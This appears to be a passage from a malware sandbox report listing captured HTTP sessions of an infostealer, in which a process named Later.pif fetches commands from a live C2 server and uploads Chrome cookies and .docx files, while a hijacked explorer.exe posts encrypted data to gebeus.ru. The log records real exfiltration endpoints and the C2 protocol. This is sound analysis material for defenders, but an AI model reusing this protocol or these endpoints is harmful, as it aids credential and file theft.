Jul 15, 2024 06:13:23.079749107 CEST	4944	OUT	Data Raw: 52 45 79 5a 59 62 52 70 6a 43 7a 4c 6d 74 55 74 71 72 6c 76 4c 4c 4b 73 76 5c 51 65 59 5a 48 70 55 52 58 79 4c 4b 75 42 43 57 5a 58 51 2e 65 78 65 22 20 0d 0a 49 44 3a 20 33 31 36 30 2c 20 4e 61 6d 65 3a 20 51 65 59 5a 48 70 55 52 58 79 4c 4b 75 Data Ascii: REyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 3160, Name: QeYZHpURXyLKuBCWZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 2
Jul 15, 2024 06:13:23.079772949 CEST	4944	OUT	Data Raw: 54 73 64 6b 58 76 69 69 43 7a 51 65 6d 69 62 7a 47 5a 6f 71 66 53 65 47 56 41 47 41 50 71 70 4c 55 79 44 44 6c 61 44 59 69 4f 78 45 4e 6b 67 67 67 79 52 45 79 5a 59 62 52 70 6a 43 7a 4c 6d 74 55 74 71 72 6c 76 4c 4c 4b 73 76 5c 51 65 59 5a 48 70 Data Ascii: TsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 6300, Name: QeYZHpURXyLKuBCWZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRp
Jul 15, 2024 06:13:23.079874039 CEST	2472	OUT	Data Raw: 5a 58 51 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 68 69 72 58 54 73 64 6b 58 76 69 69 43 7a 51 65 6d 69 62 7a 47 5a 6f 71 66 53 65 47 56 41 47 41 50 71 70 4c Data Ascii: ZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXviiCzQemibzGZoqfSeGVAGAPqpLUyDDlaDYiOxENkgggyREyZYbRpjCzLmtUtqrlvLLKsv\QeYZHpURXyLKuBCWZXQ.exe" ID: 1852, Name: QeYZHpURXyLKuBCWZXQ.exe, CommandLine: "C:\Program Files (x86)\hirXTsdkXvii
Jul 15, 2024 06:13:23.079952955 CEST	139	OUT	Data Raw: 20 36 35 38 34 2c 20 4e 61 6d 65 3a 20 4c 61 74 65 72 2e 70 69 66 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 37 38 38 30 31 5c 4c 61 74 65 Data Ascii: 6584, Name: Later.pif, CommandLine: C:\Users\user\AppData\Local\Temp\78801\Later.pif ID: 4672, Name: WmiPrvSE.exe, CommandLine: NULL
Jul 15, 2024 06:13:23.905800104 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:23 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ugosbomq8nu73aumse22g22hvk; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49744	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:23.556608915 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hocvueqllial.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: gebeus.ru
Jul 15, 2024 06:13:23.556642056 CEST	126	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 4b d1 a4 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu7K{f93]6Yw3!S
Jul 15, 2024 06:13:24.612420082 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49745	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:24.007376909 CEST	124	OUT	POST /getpu HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 10 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 Data Ascii: idb=e_user
Jul 15, 2024 06:13:24.720376968 CEST	419	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:24 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=korvj2003p4u7cpgf15m6u7t5d; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 62 0d 0a 7b 22 70 61 74 68 22 3a 22 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: b{"path":""}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49746	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:24.730767012 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=0
Jul 15, 2024 06:13:25.444513083 CEST	497	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:25 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=tucb8ba6hlf9i6m6ucbb6vpcp9; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 35 38 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 2c 22 63 6f 6d 6d 61 6e 64 22 3a 22 62 72 6f 77 73 65 72 73 7c 66 69 6c 65 73 7c 77 61 6c 6c 65 74 73 22 2c 22 70 61 74 68 73 22 3a 22 44 65 73 6b 74 6f 70 2c 44 6f 63 75 6d 65 6e 74 73 7c 2e 74 78 74 2c 2e 64 6f 63 7c 30 3b 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 58{"msg":true,"command":"browsers\|files\|wallets","paths":"Desktop,Documents\|.txt,.doc\|0;"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49747	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:25.921644926 CEST	480	OUT	POST /sendcookies HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 368 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3c 41 4e 44 3e 6c 6f 67 3d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 46 61 6c 73 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 39 37 38 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 34 2d 31 33 0d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 72 75 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 32 36 39 09 4e 49 44 09 35 31 31 3d 45 66 35 76 50 46 47 77 2d 4d 5a 59 6f 35 68 77 65 2d 30 54 68 41 56 73 6c 62 78 62 6d 76 64 56 5a 77 63 48 6e 71 56 7a 57 48 41 55 31 34 76 35 33 4d 4e 31 56 76 77 76 51 71 38 62 61 59 66 67 32 2d 49 41 74 71 5a 42 56 35 4e 4f 4c 35 72 76 6a 32 4e 57 49 71 72 7a 33 37 37 55 68 4c 64 48 74 4f 67 45 2d 74 4a 61 42 6c 55 42 59 4a 45 68 75 47 73 51 64 71 6e 69 33 6f 54 4a 67 30 62 72 71 76 31 64 6a 64 69 4c 4a 79 76 54 53 55 68 64 4b 2d 63 35 4a 57 61 64 43 53 [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>name=Google Chrome<AND>log=.google.comFalse/True12404279781P_JAR2023-10-04-13.google.comTrue/True1240427269NID511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4<AND>count=2
Jul 15, 2024 06:13:26.615010977 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:26 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=dkgphdc41n5uh5v60k60m4ilp2; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49748	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:27.015256882 CEST	1228	OUT	POST /sendfiles HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 1117 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=FACWLRWHGG.docx<AND>file=FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQO [TRUNCATED]
Jul 15, 2024 06:13:27.709989071 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:27 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=hcv6622t3tdir89p006serm1cu; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49749	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:27.837039948 CEST	1228	OUT	POST /sendfiles HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 1117 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=MQAWXUYAIK.docx<AND>file=MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBET [TRUNCATED]
Jul 15, 2024 06:13:28.531898022 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:28 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=dugh1a4h4ineddn4cc62m1nsfm; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49750	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:28.731926918 CEST	1236	OUT	POST /sendfiles HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 1129 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=XQACHMZIHU.docx<AND>file=XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLA [TRUNCATED]
Jul 15, 2024 06:13:28.731926918 CEST	6	OUT	Data Raw: 9d a0 ab 52 Data Ascii: R
Jul 15, 2024 06:13:29.404126883 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=pbra0kstsk5clnl0i9ifnajeei; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49751	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:28.990973949 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kojxnjsmgyh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: gebeus.ru
Jul 15, 2024 06:13:28.991024017 CEST	363	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 22 fb f4 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vuy"t`DT6sK('\|H3_"VXm+/AnL3*cRvyJo[$N)VwCUP']
Jul 15, 2024 06:13:30.064647913 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49752	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:29.547022104 CEST	1236	OUT	POST /sendfiles HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 1130 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=FACWLRWHGG.docx<AND>file=FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOI